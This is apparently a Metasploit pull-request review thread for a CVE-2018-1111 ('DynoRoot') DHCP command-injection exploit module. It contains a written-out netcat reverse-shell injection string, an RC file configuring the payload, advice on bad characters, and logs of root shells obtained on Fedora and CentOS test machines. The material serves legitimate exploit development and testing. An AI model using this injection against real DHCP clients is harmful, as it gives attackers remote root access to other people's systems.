Add CVE-2018-1111 exploit

[kkirsche]

Verification

• Setup CentOS virtual machine and Kali virtual machine
• Ensure proper versions are in use. This was tested on CentOS Linux release 7.4.1708 (Core) with NetworkManager version 1.8.0-11.el7_4
• Create isolated custom network (e.g. 192.168.41.0/24)
• Disable DHCP server on custom network for easier verification
• Start msfconsole on Kali Linux
• use exploit/unix/dhcp/rhel_dhcp_client_command_injection
• Configure SRVHOST and NETMASK required variables
• Configure PAYLOAD and supporting options
• Start the DHCP server
• On CentOS 7 machine, request a new DHCP address. Assuming primary interface is ens33, you can use: clear && nmcli conn down id "ens33" && nmcli conn up id "ens33" && ip addr show
• This should request a new DHCP from your server (if other DHCP servers exist, note that then this becomes a race condition often requiring DHCP NAK's to get your DHCP to win)

Not included :(

• Document the thing and how it works (Example)

Validated using RC File:

use exploit/unix/dhcp/rhel_dhcp_client_command_injection
set SRVHOST 192.168.41.129
set NETMASK 255.255.255.0
set PAYLOAD cmd/unix/reverse_netcat
set LHOST 192.168.41.2
set LPORT 1337
exploit -j -z

[bcoles]

I believe curl braces are the standard for msf modules.

%q{ }

[kkirsche]

Changed / fixed

[bcoles]

require 'msf/core' shouldn't be necessary

[kkirsche]

Removed. This should fix the test

[bcoles]

Build failed due to:

0.17s$ ./.git/hooks/post-merge
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb - [WARNING] Explicitly requiring/loading msf/core is not necessary
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------

[bcoles]

https

[kkirsche]

Fixed, good eye!

[wvu]

Already required in the mixin.

[kkirsche]

Removed. Good catch!

[wvu]

Feels like you'd have some badchars from the injection. Would be worthwhile to perform badchar analysis and then update BadChars.

[kkirsche]

Do you have any suggestions for how to perform that analysis? Unlike a buffer overflow where I can investigate the registers, I don't have a good sense of how I'd do that with a command injection like this

[wvu]

I'd start by looking at my injection and eliminating as many shell metacharacters or otherwise "breaking" characters as I can.

Then I'd encode away the remaining ones, escape them, quote them, comment them out, or match them. Then I'd verify with strace, ltrace, etc.

It really depends on the vuln, the environment, and the payload. Hope this helps.

[wvu]

I didn't dig into this vuln deeply yet, but judging by the injection used here, you shouldn't have to worry about too many badchars.

Appears a string is being completed (matched quotes), previous command backgrounded, payload injected, and everything else commented out. It's a tried-and-true technique.

You can probably randomize the x.

[wvu]

Another thing to watch out for is if you have badchars in the protocol or otherwise over the wire. Sometimes your injection can look solid from the software side but get messed up on the networking side.

Lastly, you may want to account for software or network protections. Something like a WAF would have to be evaded. I don't think that's much of a concern here.

[wvu]

Good bot.

[kkirsche]

Added a randomization on the x here

[wvu]

It's almost certainly not capped at one byte either. Might want to use a longer random-length random string.

[bcoles]

I was under the impression that Space was of concern here.

Edit Apparently space is no longer a concern, in which case: Rex::Text.rand_text_alpha(6..12) to generate 6 to 12 random alpha characters.

[kkirsche]

mzdPvddRUFMT'&mkfifo /tmp/klgcql; nc 192.168.41.128 1337 0</tmp/klgcql | /bin/sh >/tmp/klgcql 2>&1; rm /tmp/klgcql  #

A few different manual tests I've been doing to see if some shell functionality does or doesn't work:

set CMD cat /etc/passwd | cut -d ':' -f 1 > /tmp/test && cat /tmp/test | cut -d '-' -f 1 > /tmp/test2
set CMD "for i in $(seq -s ' ' 1 255); do ping -c 1 \"192.168.41.${i}\" 2>&1; done > /tmp/pingsweep"

Worked and felt relatively contrived in their design, trying to hit many different types of command characters

[wvu]

I'd have to check the RFC(s), but does this still apply to options?

[kkirsche]

Based on RFC2132, seems like it does not.

Options may be fixed length or variable
   length.  All options begin with a tag octet, which uniquely
   identifies the option.  Fixed-length options without data consist of
   only a tag octet.  Only options 0 and 255 are fixed length.  All
   other options are variable-length with a length octet following the
   tag octet.  The value of the length octet does not include the two
   octets specifying the tag and length.  The length octet is followed
   by "length" octets of data.  Options containing NVT ASCII data SHOULD
   NOT include a trailing NULL; however, the receiver of such options
   MUST be prepared to delete trailing nulls if they exist.  The
   receiver MUST NOT require that a trailing null be included in the
   data.  In the case of some variable-length options the length field
   is a constant but must still be specified.

https://tools.ietf.org/html/rfc2132

[wvu]

Cool, didn't think so. Phew!

[wvu]

I'd remove this hash altogether. cmd for PayloadType already includes most, and you're not specifying RequiredCmd. And this vuln isn't targeting an appliance or anything where the environment is known, so we shouldn't need to limit ourselves.

[kkirsche]

Removed this for PayloadType cmd instead

[wvu]

Feel free to include your own PoC in this array. :)

[wvu]

I'd add an AKA reference for DynoRoot, too.

[kkirsche]

Added

[wvu]

Might be more to deregister here, such as any PXE options.

[kkirsche]

I'll remove FILENAME related to PXE, don't know that any of the others like DHCPIP start and end, BROADCAST, ROUTER, etc. are related to PXE

[kkirsche]

Removed FILENAME, others didn't seem like they were related to PXE in show options or show advanced

[wvu]

Cool, thanks.

[wvu]

Speaking of space, I'm pretty sure this doesn't apply. Nothing to pad with NOPs. This thing doesn't even need NOPs.

[kkirsche]

Removed

[kkirsche]

So as a heads up, this does generate a malformed packet, but it's malformed without the change to how we build the packet in the server.rb file. The question I'd have is should fixing the DHCP server to not generate malformed packets really be something that's included in this PR or should that be potentially broken out as a separate PR / review process?

[kkirsche]

Found the issue actually. DOMAINNAME is included in the packet even though we don't generate it. Thus, it's an invalid packet since the option isn't correct. adding an if makes this be a valid packet.

Valid packet with the if statement:

Invalid packet without it (you'll notice the OpEnd / padding is instead being picked up as the option, which is incorrect):

[kkirsche]

Let me know how this looks @wvu-r7 or if you'd like more extensive bad char testing than simply working through some of the main shell control characters (e.g. |, &, &&, shell expansion, shell redirection [<, >, >>], etc.)

[bcoles]

This should be a hash rocket for consistency

'PayloadType' => 'cmd',

[kkirsche]

Fixed

[bcoles]

You can add a 'Privileged' => true, key to this hash somewhere, to show off that your exploit gives remote r00t.

[kkirsche]

Fixed

[bcoles]

The module worked for me on Fedora 27 (x64) (nm version 2.29-6.fc27).

msf5 exploit(unix/dhcp/rhel_dhcp_client_command_injection) > sessions -i 36
[*] Starting interaction with 36...

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
    
uname -a
Linux localhost.localdomain 4.13.9-300.fc27.x86_64 #1 SMP Mon Oct 23 13:41:58 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

cat /etc/os-release
NAME=Fedora
VERSION="27 (Workstation Edition)"
ID=fedora
VERSION_ID=27
PRETTY_NAME="Fedora 27 (Workstation Edition)"
ANSI_COLOR="0;34"
CPE_NAME="cpe:/o:fedoraproject:fedora:27"
HOME_URL="https://fedoraproject.org/"
SUPPORT_URL="https://fedoraproject.org/wiki/Communicating_and_getting_help"
BUG_REPORT_URL="https://bugzilla.redhat.com/"
REDHAT_BUGZILLA_PRODUCT="Fedora"
REDHAT_BUGZILLA_PRODUCT_VERSION=27
REDHAT_SUPPORT_PRODUCT="Fedora"
REDHAT_SUPPORT_PRODUCT_VERSION=27
PRIVACY_POLICY_URL="https://fedoraproject.org/wiki/Legal:PrivacyPolicy"
VARIANT="Workstation Edition"
VARIANT_ID=workstation

[bcoles]

The module worked for me on Centos 7 1708 (x64) (nm version 2.25.1-31.base.el7); however it did not work with the default payload cmd/unix/reverse as the telnet executable was not present. The VM is in a fairly clean state and I'm fairly certain I haven't removed telnet.

I used the cmd/unix/reverse_perl, cmd/unix/reverse_awk, cmd/unix/reverse_openssl, cmd/unix/reverse_netcat and cmd/unix/reverse_bash payloads with success.

msf5 exploit(unix/dhcp/rhel_dhcp_client_command_injection) > [*] Command shell session 1 opened (10.1.1.197:4444 -> 10.1.1.6:53208) at 2018-05-19 17:08:08 -0400

msf5 exploit(unix/dhcp/rhel_dhcp_client_command_injection) > sessions -i 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

uname -a
Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

cat /etc/os-release
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"

which telnet
which: no telnet in (/bin:/usr/bin:/sbin)

locate telnet
/etc/selinux/targeted/active/modules/100/telnet
/etc/selinux/targeted/active/modules/100/telnet/cil
/etc/selinux/targeted/active/modules/100/telnet/hll
/etc/selinux/targeted/active/modules/100/telnet/lang_ext
/usr/include/arpa/telnet.h
/usr/lib/firewalld/services/telnet.xml
/usr/lib64/python2.7/telnetlib.py
/usr/lib64/python2.7/telnetlib.pyc
/usr/lib64/python2.7/telnetlib.pyo
/usr/share/ruby/net/telnet.rb

^Z
Background session 1? [y/N]  y

I also tried on CentOS 6.5 (x64) (nm version 2.20.51.0.2-5.36-el6 20100205). An IP address was allocated correctly, however I was unable to get a session.

[wvu]

@kkirsche: You've done an awesome job already. I think this will be good to go come Monday. Thanks!

[bcoles]

RHEL 6.6 (x64) (nm version 2.20.51.02-5.42.el6 20100205) received an IP address from DHCP server, but wasn't able to get a session.

RHEL 7 Server (x64) (nm version 2.23.52.0.1-16.el7 20130226) received an IP address from DHCP server, but wasn't able to get a session.

Tested using cmd/unix/reverse_perl payload, as telnet executable was not present. I didn't investigate thoroughly.

[kkirsche]

Telnet is not included in CentOS 6.9 with a default installation and does not seem to accept the injection regardless of option or basic modifications such as changing the ' to ", changing ' to `\x27', etc. Looking at it through ltrace you can see it picking up the option just not acting on it.

root@kali:~# grep -rni 'nc 192' -A 15 -B 15 trace.txt 
2861-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2862-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2863-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2864-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2865-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2866-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2867-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2868-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2869-strncasecmp(0x7effa0771610, 0x7eff9eeab433, 8, 0, 0x7effa0771610)                                                               = 0
2870-strtol(0x7effa0771618, 0, 10, 3, 0)                                                                                             = 252
2871-strlen("unknown-252")                                                                                                           = 11
2872-malloc(44)                                                                                                                      = 0x7effa0773a40
2873-memset(0x7effa0773a40, '\000', 44)                                                                                              = 0x7effa0773a40
2874-memcpy(0x7effa0773a60, "unknown-252", 11)                                                                                       = 0x7effa0773a60
2875-free(0x7effa0771610)                                                                                                            = <void>
2876:memcpy(0x7ffc8ec1a850, "mD'&mkfifo /tmp/dkrslmx; nc 192."..., 110)                                                              = 0x7ffc8ec1a850
2877-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2878-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2879-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2880-malloc(117)                                                                                                                     = 0x7effa0773a80
2881-memset(0x7effa0773a80, '\000', 117)                                                                                             = 0x7effa0773a80
2882:memcpy(0x7effa0773a84, "mD'&mkfifo /tmp/dkrslmx; nc 192."..., 109)                                                              = 0x7effa0773a84
2883-malloc(64)                                                                                                                      = 0x7effa0773b00
2884-memset(0x7effa0773b00, '\000', 64)                                                                                              = 0x7effa0773b00
2885-malloc(136)                                                                                                                     = 0x7effa0773b50
2886-memset(0x7effa0773b50, '\000', 136)                                                                                             = 0x7effa0773b50
2887-malloc(16)                                                                                                                      = 0x7effa0771610
2888-memset(0x7effa0771610, '\000', 16)                                                                                              = 0x7effa0771610
2889-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2890-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2891-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2892-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2893-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2894-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2895-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2896-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2897-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
--
4138-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4139-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4140-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4141-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4142-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4143-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4144-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4145-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4146-strncasecmp(0x7effa0774020, 0x7eff9eeab433, 8, 0, 0x7effa0774020)                                                               = 0
4147-strtol(0x7effa0774028, 0, 10, 3, 0)                                                                                             = 252
4148-strlen("unknown-252")                                                                                                           = 11
4149-malloc(44)                                                                                                                      = 0x7effa0774040
4150-memset(0x7effa0774040, '\000', 44)                                                                                              = 0x7effa0774040
4151-memcpy(0x7effa0774060, "unknown-252", 11)                                                                                       = 0x7effa0774060
4152-free(0x7effa0774020)                                                                                                            = <void>
4153:memcpy(0x7ffc8ec1a850, "mD'&mkfifo /tmp/dkrslmx; nc 192."..., 110)                                                              = 0x7ffc8ec1a850
4154-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4155-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4156-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4157-malloc(117)                                                                                                                     = 0x7effa0774080
4158-memset(0x7effa0774080, '\000', 117)                                                                                             = 0x7effa0774080
4159:memcpy(0x7effa0774084, "mD'&mkfifo /tmp/dkrslmx; nc 192."..., 109)                                                              = 0x7effa0774084
4160-malloc(64)                                                                                                                      = 0x7effa0774100
4161-memset(0x7effa0774100, '\000', 64)                                                                                              = 0x7effa0774100
4162-malloc(136)                                                                                                                     = 0x7effa0774150
4163-memset(0x7effa0774150, '\000', 136)                                                                                             = 0x7effa0774150
4164-malloc(16)                                                                                                                      = 0x7effa0774020
4165-memset(0x7effa0774020, '\000', 16)                                                                                              = 0x7effa0774020
4166-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4167-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4168-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4169-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4170-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4171-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4172-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4173-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4174-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0

I do not have access to a RHEL to attempt any form of troubleshooting on that host.

[kkirsche]

Let me know how you'd like us to try handling this @wvu-r7

[kkirsche]

Wanted to follow up on this and see if more action is needed

[wvu]

Ayy, I'm getting to it.

[kkirsche]

All good, not trying to rush you. Just wanted to make sure that you were not waiting for me on something. If that changes, just give a shout 👍

[wvu]

Thanks! It looked pretty good at the end of last week.

[wvu]

f4bb00b, 4dd7444

[wvu]

Release Notes

This adds an exploit for CVE-2018-1111 (aka "DynoRoot"), a command injection vulnerability against NetworkManager's DHCP client script on Red Hat, CentOS, and Fedora systems.

[kkirsche]

Thanks for your help reviewing and merging this. Appreciate it!

[wvu]

So sorry for the delay, @kkirsche. Lots going on. I hope that you will contribute again!

[kkirsche]

No worries. Ive had time like that and sure I will again. Just appreciate getting to help out. You’ll definitely see some more from me :)

[wvu]

🙇